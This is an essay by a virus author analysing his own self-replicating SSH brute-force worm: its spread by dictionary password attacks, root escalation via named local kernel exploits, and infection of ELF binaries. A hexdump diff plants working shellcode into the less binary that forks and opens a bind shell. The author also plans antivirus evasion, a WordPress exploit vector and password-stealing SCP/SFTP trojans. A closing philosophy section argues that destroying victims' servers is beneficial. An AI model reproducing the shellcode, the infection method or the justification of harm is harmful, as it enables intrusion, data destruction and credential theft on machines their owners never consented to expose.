AltSci Concepts Virus Analysis

by Joel R. Voss aka. Javantea
jvoss@altsci.com
March 6, 2008

Introduction

It's a pretty simple virus, so the lessons learned from analysis of this virus should carry over to more than just this virus. I tried to write it generically enough to fit any case, so when I analyze it I will compare it to other viruses and how things on the net work. I'll try to come from a neutral standpoint because the idea of demonizing or glorifying a virus are counterproductive to the task of learning what it is and why it is. I'll try to keep the philosophy in the next to last section clearly marked so people who wish can skip over it or skip to it if that's their prerogative.

Method

Design of Infection Vector

Every virus needs to get onto a computer (host) somehow. Viruses of old days resided on floppies. These days they are much more often carried by computer networks, the internet being the largest. If you think of floppies and other medium as sort of sneakernet, then all viruses need a network. This method of transfer ends up running code on a system that is commonly unintended by the user. In the SSH Bruteforce Virus, I spread the virus using a dictionary password cracker that supports Secure Shell (SSH). This is very simple and uses an open source library for SSH (libssh-0.2). When my virus successfully logs into a remote system, it copies a tar archived version of itself to the victim. It extracts the archive and executes the payload script. The remote system now has an exact copy of the virus. This is the definition of a replication virus. At this point, the system is infected and can infect more systems.

How virulent is an SSH dictionary password attack? Not very. Compared to viruses that are in the wild in 2008, an SSH attack would be quite slow and ineffective.

I did a scan of my /16 (216.127.0.0/16 is 65536 addresses) using NMap stealth SYN scan, a trivial task. I found 4550 ips responding on port 22 (SSH). I could not tell whether these were machines with multiple ips which is common with servers. Future scans will record version, route and may test TCP variables. This is a rather lot of work, so I don't suspect that it will be in the next issue.

The Storm Worm and Botnet in comparison infected 274,372 out of 2.6 million machines scanned by Microsoft's Windows Malicious Software Removal Tool [1]. 10% infection rate is extremely high for viruses. The infection vector of drive-by downloading websites is effective because Internet Explorer browser is so often vulnerable to easily exploitable bugs. Though Microsoft blames it on their -- albeit quickly waning -- popularity and users unwillingness to update regularly, it should be clear to virus researchers that these are serious programming flaws.

In the case of SSH there are very few attack vectors. Having worked tech support for a small web host, I noticed that SSH and CPanel passwords were often dictionary words, which is against best practices. Since users either forget their passwords or write them down if forced to use a good password, dictionary passwords make up perhaps 2% of passwords on these large hosts. Matching a hostname and username with a dictionary password becomes the task, which causes the infection rate to become something near 0.02 * 0.01 * 0.001 = 1:5,000,000. Since the process can be automated, distributed, and possibly anonymized through Tor this becomes a pretty good rate by time. However comparing the same infection rate that we have for Storm, there is no way that there exist 200k dictionary passwords on SSH servers even though there is possibly 23M IP addresses [2] running SSH, most of them will resist the attack for a long enough time to detect and block the attack. Most larger hosts have automated IDS to block these sort of attacks and many smaller hosts can detect it by looking at logs (often accidentally).

Assuming a flood of new Linux/BSD users and ssh being enabled on each machine and port forwarding or DMZ being activated on the modem (a quite unlikely circumstance), it is possible that a large number of these machines could be infected. Most Linux distros do not turn on SSH without the admin explicitly turning it on. This may change in the future, but should not in large numbers. Also, since home and business users are behind NAT, their SSH should be protected. Viruses like Storm that use a pull method (web browser vulnerability or e-mail social engineering) don't have to worry about NAT.

Much more likely, the SSH Bruteforce Virus would be able to infect current shared server that allow poor passwords. Large hosts like dreamhost and their smaller competitors would be the main target of this virus.

Getting Administrator Privileges

After the virus has infected a machine, it can run any program as the user it has infected as. It is uncommon for root to be left open on an SSH server, but it is worth a try. Testing sudo and su are also a good idea, since it is possible for a server to use the same password for root as a user or that the user infected could have sudo access. Testing sudo might alert an aware admin, but often these logs are overlooked even by better admins. More likely to cause root compromise is a local root vulnerability. Currently many versions of linux are vulnerable to local root bugs. For example h00lyshit covers much of 2.6.0-2.6.17 and the new vmsplice vulnerability (jessica_beal_in_my_bed.c) covers most of 2.6.17-2.6.24.3. 2.4 has a large number of local root vulnerabilities also that are well documented and exploitable with simple tools. Simply testing each of these and checking whether it gives a root shell is an easy task.

For virus authors, Windows is an easy target for root since the user infected almost always has administrator privileges.

BSD based operating systems are known for their high security and there has only been a few local and remote root vulnerabilities in recent history.

Infecting Binaries

Assuming that administrator privileges have been gained, the entire system is left to the attacker. The obvious attack is to install a rootkit. It is common to add a kernel module to hide and give return access to the virus. My virus currently does not infect the kernel, though it is planned for a future version. Currently it infects x86 ELF binaries. This is the most interesting part for virus writers usually because it requires low-level understanding of a computer, usually assembly, executable format, and system internals. It also changes the game of viral infection. A computer that has been properly infected by a virus cannot be uninfected. The hard drive must be formatted or completely scanned offline to ensure that the various infections have not continued the infection of the virus. Since this is an expensive task and involves potentially losing a lot of expensive data, viruses that infect binaries are especially harmful to victims.

Infecting an ELF32

Somewhere in the code, we need the binary to transfer control of the program to our virus. Whether the virus gives the control back or not is up to the virus. In my virus, I give control to the virus at the first opportunity: the entry point. Each ELF32 header has an entry point variable which points to the memory of where the program starts executing. I store this and overwrite it with a pointer to a place in the .rodata section (read-only data) where my shellcode is stored. In .rodata I overwrite data so that the executable file size is the same as it was originally. The data that I overwrite is specifically designed to be the largest section of ascii in the section. Most of data in .rodata is never accessed, so this causes no error. If I overwrite data that is accessed, it will almost always be data that is unimportant to the functioning of the process. For example, less when infected with this virus shows the shellcode in the bottom line instead of the line number. A person who is running less would possibly notice this, but in many systems the output of less is not carefully examined regularly unless the system is under heavy development. In programs where the output is very rarely checked such as apache and modprobe, this virus can run completely undetected.

Hexdump Diff:

--- less2.hex   2008-03-17 05:15:12.000000000 -0700
+++ lessPwn3d2.hex      2008-03-17 05:15:34.000000000 -0700
@@ -1,5 +1,5 @@
 0000:0000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............
-0000:0010 02 00 03 00 01 00 00 00 a0 93 04 08 34 00 00 00 ........ ...4...
+0000:0010 02 00 03 00 01 00 00 00 60 08 06 08 34 00 00 00 ........`...4...
 0000:0020 a8 b4 01 00 00 00 00 00 34 00 20 00 08 00 28 00 ¨´......4. ...(.
 0000:0030 1b 00 1a 00 06 00 00 00 34 00 00 00 34 80 04 08 ........4...4...
 0000:0040 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 4...............
@@ -6276,20 +6276,20 @@
 0001:8830 79 74 65 20 25 62 42 3f 73 2f 25 73 2e 20 3f 65 yte %bB?s/%s. ?e
 0001:8840 28 45 4e 44 29 20 3a 3f 70 42 25 70 42 5c 25 2e (END) :?pB%pB\%.
 0001:8850 2e 25 74 00 00 00 00 00 00 00 00 00 00 00 00 00 .%t.............
-0001:8860 3f 66 25 66 20 2e 3f 6e 3f 6d 28 25 54 20 25 69 ?f%f .?n?m(%T %i
-0001:8870 20 6f 66 20 25 6d 29 20 2e 2e 3f 6c 74 6c 69 6e  of %m) ..?ltlin
-0001:8880 65 73 20 25 6c 74 2d 25 6c 62 3f 4c 2f 25 4c 2e es %lt-%lb?L/%L.
-0001:8890 20 3a 62 79 74 65 20 25 62 42 3f 73 2f 25 73 2e  :byte %bB?s/%s.
-0001:88a0 20 2e 3f 65 28 45 4e 44 29 20 3f 78 2d 20 4e 65  .?e(END) ?x- Ne
-0001:88b0 78 74 5c 3a 20 25 78 2e 3a 3f 70 42 25 70 42 5c xt\: %x.:?pB%pB\
-0001:88c0 25 2e 2e 25 74 00 00 00 00 00 00 00 00 00 00 00 %..%t...........
-0001:88d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
-0001:88e0 3f 6e 3f 66 25 66 20 2e 3f 6d 28 25 54 20 25 69 ?n?f%f .?m(%T %i
-0001:88f0 20 6f 66 20 25 6d 29 20 2e 2e 3f 65 28 45 4e 44  of %m) ..?e(END
-0001:8900 29 20 3f 78 2d 20 4e 65 78 74 5c 3a 20 25 78 2e ) ?x- Next\: %x.
-0001:8910 3a 3f 70 42 25 70 42 5c 25 3a 62 79 74 65 20 25 :?pB%pB\%:byte %
-0001:8920 62 42 3f 73 2f 25 73 2e 2e 2e 25 74 00 00 00 00 bB?s/%s...%t....
-0001:8930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+0001:8860 31 c0 b0 02 cd 80 31 db 39 d8 75 62 31 c0 31 db 1À°.Í.1Û9Øub1À1Û
+0001:8870 99 50 6a 01 6a 02 89 e1 fe c3 b0 66 cd 80 89 c6 .Pj.j..áþÃ°fÍ..Æ
+0001:8880 fe c6 66 52 b2 7f fe ce 66 52 66 68 05 39 b2 02 þÆfR².þÎfRfh.9².
+0001:8890 66 52 89 e1 6a 10 51 56 89 e1 b3 03 b0 66 cd 80 fR.áj.QV.á³.°fÍ.
+0001:88a0 99 56 8b 1c 24 31 c9 b1 03 fe c9 b0 3f cd 80 75 .V..$1É±.þÉ°?Í.u
+0001:88b0 f8 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 53 øRh//shh/bin.ãRS
+0001:88c0 89 e1 b0 0b cd 80 b3 02 31 c0 b0 01 cd 80 90 90 .á°.Í.³.1À°.Í...
+0001:88d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:88e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:88f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8900 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8910 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8920 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
+0001:8930 e9 6b 8a fe ff 00 00 00 00 00 00 00 00 00 00 00 ék.þÿ...........
 0001:8940 3f 6e 3f 66 25 66 20 2e 3f 6d 28 25 54 20 25 69 ?n?f%f .?m(%T %i
 0001:8950 20 6f 66 20 25 6d 29 20 2e 2e 3f 65 28 45 4e 44  of %m) ..?e(END
 0001:8960 29 20 3f 78 2d 20 4e 65 78 74 5c 3a 20 25 78 2e ) ?x- Next\: %x.

As you can see from the above, the diff is very compact and is only related to the two active items: the entry point and .rodata overwrite. In the elf header, the original entry point is in the hex dump: 93a0 0804 = 0x080493a0. We modify this to: 0860 0806 = 0x08060860. Then down in .rodata at offset 0018860, we modify the read-only data below to become our shellcode.


?f%f .?n?m(%T %i of %m) ..?ltlines %lt-%lb?L/%L. :byte %bB?s/%s. .?e(END) ?x- Next\: %x.:?pB%pB\%..%t

If you're familiar with shellcode, it should be obvious that 31c0 b002 cd80... is shellcode. Those 6 bytes are the fork syscall in Linux. The virus is designed to run alongside the program that it has infected so that a user is not aware of the infection. By forking, the virus creates a second process with the same name as the original program. The fork is so quick that the program starts up without any delay. Using a hack such as scream1 (included in the virus source code) it is possible to change the executable's name to any so that the user is entirely unaware of the virus if they check using ps aux.

Looking through the .rodata, a more advanced version of the virus could target read-only strings that are almost never displayed by the program. There is quite a lot of unused data in .rodata. Programmers like myself that are very verbose in their error responses have thousands of bytes of unused read-only data. The program's usage is a common long string that can be overwritten without affecting normal usage (though it would quickly alert a suspicious user who is checking the usage).

Several problems could occur when .rodata is overwritten. In the case of less, we overwrite patterns such as %i. It is possible to cause a format string segfault, though quite unlikely. Also, if the code does not have enough null terminators, a strcpy or a sprintf could overflow a buffer overwriting the eip with garbage. I have not found an example of that, but it is reasonable that such a problem could occur. This is a rather sticky issue if it ever occurs, but can be easily fixed by trial and error. Adding nulls, removing percents, and so forth is actually trivial:

; add a null without changing the effect of the code
add $0, %eax
; putting a % into %al without adding a % to the code.
mov $36, %al
add $1, %al

The virus selects the position of the shellcode based on the length of strings in .rodata. It also can pick a random position if told. This makes it almost impossible to guess the position of the shellcode. If you calculate the position of the .rodata using the same code as in the virus, then check all for shellcode, then you will be able to detect the shellcode. Currently there is no other method of getting to the shellcode but the entry address, so calculating which section the entry address points to could detect the virus. It is possible that a future version of the virus could point to a nop section in the .text which is overwritten with a jump to the .rodata. This would make the detection process more difficult but still possible. If a very advanced version of the virus made a non-deterministic piece of code in .text that ended up pointing to .rodata, it could still be detected since normal programs are much saner about their execution. If a virus modified the main code to act very much like a normal program, it would still need to either act unprogram-like or jump to .rodata (both of which give it away). A virus that does not put shellcode in .rodata and only puts shellcode in .text would need to overwrite unused code. Finding code that is rarely used is a fairly difficult task. The Bukowski Virus replaces sections of nops used for alignment with the virus. This limits the virus size to a fraction of the number of nops in the program (usually very small).

In the future, if a virus definition is created, this article will link to it. I will also write an article describing the implications of the anti-virus with a link.

Future

In the above, I have explained several methods of making the virus all that it can be. I have discussed overall limitations to viruses that act like this. Here I will not repeat those ideas, but list those projects that I am working on which can be developed in the short term. When 1.1 is released, the virus will be renamed to AltSci Modular Virus since it will target multiple vulnerabilities on many platforms.

WordPress

I am currently working on a Wordpress XMLRPC exploit add-on to this framework. This would make the virus use two different methods of infection: SSH and Web. Wordpress XMLRPC is a very different infection vector because a single server could have hundreds of domains that are difficult to guess. A different method of finding Wordpress sites is in development: using search engines, a spider, and automated link portals such as digg and del.icio.us. The virus would download a random list of wordpress sites and get their version number. If the version is exploitable, the virus will run the exploit. This will allow the virus to upload the tar archive and run the executable in the same was as the SSH infection vector. The list of sites can be accumulated and used for other purposes. For example, if another piece of software is found to be vulnerable to a different attack, the virus will have a list of vulnerable sites, so once the patch is installed, it can immediately attack those vulnerable sites. Version 1.1 will include a basic WordPress XMLRPC attack.

Shellcode Writing in C

I am currently working on a project to use the -fPIC flag to compile C code into position independent code so that it can be executed as shellcode. There are bugs that are hindering this project, but I suspect that it will be ready for the modular virus in version 1.2 to be released Q2 2008.

Polymorphic Tar Archive and Binaries

Since the archive is a point at which an anti-virus could attempt to signature the virus, modifying its contents so that the archive cannot be identified is a project for the virus. It would not be difficult to trick an anti-virus that looked just for filenames or file checksums, but one that looks for core pieces of the virus binary may be more difficult to evade. If it is found that a virus definition can be avoided by modifying the archive and/or binaries, a release in the future will contain this simple code. The obvious reason why this might work is that if an anti-virus program untarred every compressed archive that was copied, it would slow down the server immensely, so anti-viruses must be more frugal with resources.

Infecting ClamAV, Tripwire, SCP, and SFTP

Viruses are constantly competing with their nemesis anti-virus programs. The AltSci Modular Virus would benefit greatly by checking for anti-virus when it runs and disabling it if possible. Anti-virus programs that use kernel modules would be able to detect the virus infection as soon as it attempts to overwrite an executable or get root. Luckily Linux and BSD anti-viruses do not use this method of detection. If an anti-virus is found, it could be modified specifically to not detect the virus. SCP and SFTP are programs that transfer files between a system and an authenticated system. By infecting these programs, the virus can steal passwords and infect remote machines. This is actually easier than it sounds. As each of these programs is manually infected, the module to infect them will be added to the virus.

Graphical User Interface

Since the intention of this virus is to distribute this virus as wide as possible, I plan to write a Gtk+2 GUI for the virus so that end users can easily run this program. From there, I can port the virus to Win32 as well as other operating systems so that more users can use this virus. Since the GUI will be run on intentional users machines, it must be clear that the user's binaries will not be infected. The user will be running the payload that bruteforces SSH, but will not be harming their own system. A GUI will be useful since the method of command line control of a large number of servers via SSH is currently very manual. The user currently runs a client that connects to the virus and can connect to any of the infected machines currently connected to the virus. The user gets a shell and can run the same client program to connect to that machine's virus and so on. With a GUI, a simple tab-based interface very familiar to users can be used to control all of the machines connected in a tree. The GUI will be added in version 1.3 in Q3 2008.

Philosophy

As I explained in the introduction, I wish to discuss the philosophy of this virus in this section. If you are not interested, feel free to skip to the next section. I wrote this virus with several motivations in mind. First, the virus is an effective method of gaining control of vulnerable machines which are not under a person's control. Whether this is used for malicious or testing purposes, I am happy that code I write is used. Whoever has good passwords should only be positively affected by this virus. Secondly, I wished to publicize the cause of good passwords on servers since blackhats are currently using the SSH Bruteforce method to attack servers. Thirdly, I wished to write a malicious piece of code to challenge laws that prohibit the distribution of malicious tools. The German Law prohibiting the distribution of "hacking tools" is an affront to the entire security community, white hat or not.

Hacking tools are designed to be useful to a purpose. Whether the purpose is malicious or not depends entirely on the usage. Even a program with no dual use purpose such as this virus could be immensely helpful in publicizing the vulnerabilities that it exploits. If the end result of this program is five servers destroyed by a script kiddy, it will have served its purpose perfectly. Though I don't condone using this virus against unwitting victims, I certainly will neither condemn their usage. If the virus is not used, it cannot serve its purpose. I have built a network of virtual machines on my servers and am currently preparing a fun and quiet wargame with this virus on the public internet only involving my own machines. In this way I can use the virus to learn about how this virus works almost in the wild without harming any systems.

Hacking tools must be ever improved if the war against harmful network actors is to be won. This virus is an advanced tool against vulnerable machines whether they are harmful or not. Since harmful machines can often be detected and traced, they can be attacked continually with hacking tools such as this virus without doing noticeable harm to any useful network resources. This type of offense as a form of defense is currently condemned by most security experts (including myself), but may change very quickly in the near future. Many previous offensive hacking tools have become defensive hacking tools in a very short time span. For example, nmap once a offensive tool has now become a standard white hat tool. Honeypots were once research-only and offensive tools, but have now become accepted as defensive tools. Security researchers are already using bruteforce for pen testing and soon may be using them in a similar fashion as nmap or a honeypot.

The philosophy of harm which I have developed has a paper of its own (to published at a later date), so I wish to only briefly discuss the implications of such a philosophy and why the virus fits the mold properly. Harm is just by definition to be negative and bad. Without a clear definition of what negative and bad are, we cannot define harm properly. If we assume that destruction of property, improper usage of private resources, and cost of admin time are negative and harmful, then the virus infecting vulnerable machines not owned by the infector is harmful. It is normal in society that harm is to be avoided, however I make a case that harm has positive effects in certain circumstances. In the case of a virus infecting machines with dictionary passwords, the machine is vulnerable to any brute force attack. The harm is partially done when the dictionary password is chosen, and partially when the virus infects the machine. The outcome of the infection may be a hard drive format or a simple administrator intervention (if the admin is confident that the machine can be uninfected). These outcomes cost the administrator time and possibly data which can be considered the cost of the harm. The administrator is likely to change password policy on this machine as well as any other machine that can be fixed with this simple change. With this change, users will become more accustomed to using strong passwords. The harm has taught more than one person and changed more than one machine toward better practices. In this way, I can see that harm actually improves the security of the network over time. The only way for bad passwords to be fixed without administrator action is for a virus to infect the machine. This becomes an argument of means-ends philosophy which is not entirely clear to condemn. We cannot automatically say that harm must be avoided at all costs since the alternative is likely a much worse problem. Harm cannot be judged by its negative consequences alone but also the benefit that is derived. Since administrators are quite lazy, they are unlikely to upgrade or use best practices if there is no consequence. Giving administrators no incentive to upgrade or to use best practices is a bad idea. Thus harm is the only way to ensure that administrators will follow best practices. I admit that the philosophy of harm does not always make as much sense as in this example, but harm cannot always be avoided and thus must be handled. Security practices are designed to minimize harm, thus giving us a proper recourse to avoid harm.

Conclusion

I have discussed the method that this virus uses to achieve network infection, administrator privileges, binary infection, and future projects which I plan to implement. Though it is a fairly weak attack, it is useful nonetheless. It certainly advertises the use of best practices when it comes to passwords, user and administrator access separation, and intrusion detection. As each side in the war for network resources increases their weaponry's effectiveness and scope, tools like this must be written to keep both sides in check. I made this tool open source to ensure that people can learn, trust, improve and fix their code using this code in any manner they wish. I am charging a nominal price for it because I feel that my work should benefit me in the measure that it used. I offer free support to anyone who purchases the product. I wish all actors in this process good luck and good game.

If you are interested in developing, analyzing, publicizing, or discussing the AltSci Concepts Virus, please e-mail Javantea.

Permalink

Computer Journal